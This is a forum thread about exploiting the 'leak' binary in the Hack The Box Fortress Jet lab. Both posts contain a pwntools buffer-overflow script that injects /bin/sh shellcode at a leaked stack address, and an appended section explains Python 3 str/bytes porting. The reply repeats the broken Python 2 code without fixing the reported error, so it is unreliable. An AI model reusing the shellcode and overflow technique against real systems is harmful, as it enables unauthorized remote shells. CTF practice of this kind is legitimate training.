TUTORIAL HTB Fortress Jet - help needed with leak exploit
by JaneHopkirk - November 26, 2021 at 12:02 AM
#1
Can anyone help with getting the reverse shell by exploiting the leak binary?

From the free shared writeup I used this:

from pwn import *
p=remote('10.13.37.10',60001)
p.recvuntil("Oops, I'm leaking! ")
leak=int(p.recvuntil("\n"),16)
print hex(leak)
p.recvuntil("> ")
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
buf=shellcode
buf+="\x90"*(72-len(shellcode))
buf+=p64(leak, endianness="little")
p.sendline(buf)
p.interactive()



But that was for python2, and on Kali with python3 you get this error:

Traceback (most recent call last):

  File "/root/htb/jet/leak2.py", line 10, in <module>
    buf+=p64(leak, endianness="little")
TypeError: can only concatenate str (not "bytes") to str
[*]Closed connection to 10.13.37.10 port 60001



I googled the shit out of it but can't figure out a working way to get a connection.

Can anyone help?
#2
hey !

from pwn import *
#p=process("./leak")
p=remote('10.13.37.10',60001)
p.recvuntil("Oops, I'm leaking! ")
leak=int(p.recvuntil("\n"),16)
print hex(leak)
p.recvuntil("> ")
# shellcode http://shell-storm.org/shellcode/files/s...de-806.php
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
buf=shellcode
buf+="\x90"*(72-len(shellcode))
buf+=p64(leak, endianness="little")
p.sendline(buf)
p.interactive()

just do:- python sploit.py
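
The TypeError quoted in post #1 comes from Python 3 keeping text (str) and binary data (bytes) as separate types. The following is an added example, not part of either post, that reproduces the error with harmless placeholder data and compares three ways of porting the buffer-building idiom. Assumptions: `struct.pack("<Q", ...)` stands in for pwntools' `p64` so the block runs without pwntools, and the function names, the placeholder bytes and the sample hex line are constructed for illustration.

```python
import struct

WIDTH = 72    # padded field width, taken from the script in the thread
FILL = 0x90   # filler byte value, taken from the script in the thread

def parse_hex_line(line: bytes) -> int:
    """Sockets yield bytes on Python 3; decode before parsing the hex text."""
    return int(line.decode("ascii").strip(), 16)

def py2_style(blob: str, value: int):
    """Python 2 idiom from the thread: str literals joined with packed bytes."""
    buf = blob + "\x90" * (WIDTH - len(blob))
    return buf + struct.pack("<Q", value)    # TypeError on Python 3

def utf8_patch(blob: str, value: int) -> bytes:
    """Tempting patch: silences the error, but UTF-8 doubles every char >= 0x80."""
    buf = blob + "\x90" * (WIDTH - len(blob))
    return buf.encode("utf-8") + struct.pack("<Q", value)

def latin1_patch(blob: str, value: int) -> bytes:
    """Latin-1 maps code points 0..255 one-to-one onto byte values."""
    buf = blob + "\x90" * (WIDTH - len(blob))
    return buf.encode("latin-1") + struct.pack("<Q", value)

def bytes_native(blob: bytes, value: int) -> bytes:
    """Preferred: keep binary data as bytes from the first literal onward."""
    return blob.ljust(WIDTH, bytes([FILL])) + struct.pack("<Q", value)

if __name__ == "__main__":
    value = parse_hex_line(b"0x7ffdeadbeef0\n")   # constructed sample line
    try:
        py2_style("\x01\x80\xff", value)          # constructed placeholder data
    except TypeError as exc:
        print("py2 idiom:", exc)
    for fn, arg in ((utf8_patch, "\x01\x80\xff"), (latin1_patch, "\x01\x80\xff"),
                    (bytes_native, b"\x01\x80\xff")):
        print(fn.__name__, len(fn(arg, value)))
```

The UTF-8 variant runs without error but produces a longer buffer than intended, so the packed integer no longer sits at offset 72; the bytes-native and Latin-1 variants both keep the layout.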